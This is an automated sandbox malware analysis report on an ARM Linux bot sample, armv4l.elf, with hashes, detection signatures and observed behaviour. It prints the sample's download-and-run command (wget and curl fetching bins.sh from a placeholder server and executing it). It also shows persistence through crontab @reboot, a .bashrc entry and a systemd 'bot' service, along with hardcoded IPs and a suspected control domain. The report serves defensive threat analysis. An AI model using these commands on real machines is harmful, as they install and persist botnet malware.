Linux Analysis Report
armv4l.elf

Overview

General Information

Sample name: armv4l.elf
Analysis ID: 1558943
MD5: b1de6afb7105e0da26b1a219f9f5031a
SHA1: e1b3179ec8a6646d27e522414487497720a273a8
SHA256: ad9ce965f543f4b0e2993d08f40bcb29753c9020b4093f4db2f894745c53c9ea
Tags: elfuser-abuse_ch

Detection

Score: 68
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Executes the "crontab" command typically for achieving persistence
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions
Sample tries to persist itself using cron
Creates hidden files and/or directories
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection

Source: armv4l.elf Avira: detected
Source: armv4l.elf ReversingLabs: Detection: 34%
Source: armv4l.elf String: /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogarmv4l->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd@
Source: armv4l.elf String: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: armv4l.elf String: j2go/proc/net/tcp5.188.230.23137.18.73.94167.235.128.15168.191.23.13445.195.74.233141.94.21.7118.220.154.2118.210.151.8537.187.153.12745.195.74.1970123456789ABCDEF(crontab -l ; echo "@reboot %s") | crontab -/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"%s/.bashrca
Source: .bashrc.13.dr String: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: bot.service.13.dr String: ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: /bin/curl (PID: 5641) Reads hosts file: /etc/hosts
Source: /tmp/armv4l.elf (PID: 5616) Socket: 127.0.0.1:4161
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: host.zopz-api.com
Source: global traffic DNS traffic detected: DNS query: daisy.ubuntu.com
Source: tmp.csTjpj.22.dr String found in binary or memory: http://serverip/bins/bins.sh
Source: bot.service.13.dr String found in binary or memory: http://serverip/bins/bins.sh;
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogarmv4l->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd@
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal68.troj.linELF@0/4@3/0

Persistence and Installation Behavior

Source: /bin/sh (PID: 5636) Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/sh (PID: 5635) Crontab executable: /usr/bin/crontab -> crontab -
Source: /tmp/armv4l.elf (PID: 5618) File written: /root/.bashrc
Source: /usr/bin/crontab (PID: 5635) File: /var/spool/cron/crontabs/tmp.csTjpj
Source: /usr/bin/crontab (PID: 5635) File: /var/spool/cron/crontabs/root
Source: /tmp/armv4l.elf (PID: 5618) File: /root/.bashrc
Source: /bin/curl (PID: 5641) Directory: /root/.curlrc
Source: /tmp/armv4l.elf (PID: 5628) Shell command executed: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
Source: /tmp/armv4l.elf (PID: 5645) Shell command executed: sh -c "/bin/systemctl enable bot"
Source: /bin/sh (PID: 5637) Chmod executable: /usr/bin/chmod -> chmod +x bins.sh
Source: /bin/sh (PID: 5644) Chmod executable: /usr/bin/chmod -> chmod +x bins.sh
Source: /bin/sh (PID: 5647) Systemctl executable: /bin/systemctl -> /bin/systemctl enable bot
Source: /tmp/armv4l.elf (PID: 5616) Queries kernel information via 'uname'
Source: /bin/curl (PID: 5641) Queries kernel information via 'uname'
Source: armv4l.elf, 5616.1.00007fff0a8b9000.00007fff0a8da000.rw-.sdmp, armv4l.elf, 5618.1.00007fff0a8b9000.00007fff0a8da000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/armv4l.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/armv4l.elf
Source: armv4l.elf, 5616.1.000056538988c000.00005653899df000.rw-.sdmp, armv4l.elf, 5618.1.000056538988c000.00005653899df000.rw-.sdmp Binary or memory string: SV!/etc/qemu-binfmt/arm
Source: armv4l.elf, 5616.1.000056538988c000.00005653899df000.rw-.sdmp, armv4l.elf, 5618.1.000056538988c000.00005653899df000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: armv4l.elf, 5616.1.00007fff0a8b9000.00007fff0a8da000.rw-.sdmp, armv4l.elf, 5618.1.00007fff0a8b9000.00007fff0a8da000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: armv4l.elf, 5618.1.00007fff0a8b9000.00007fff0a8da000.rw-.sdmp Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped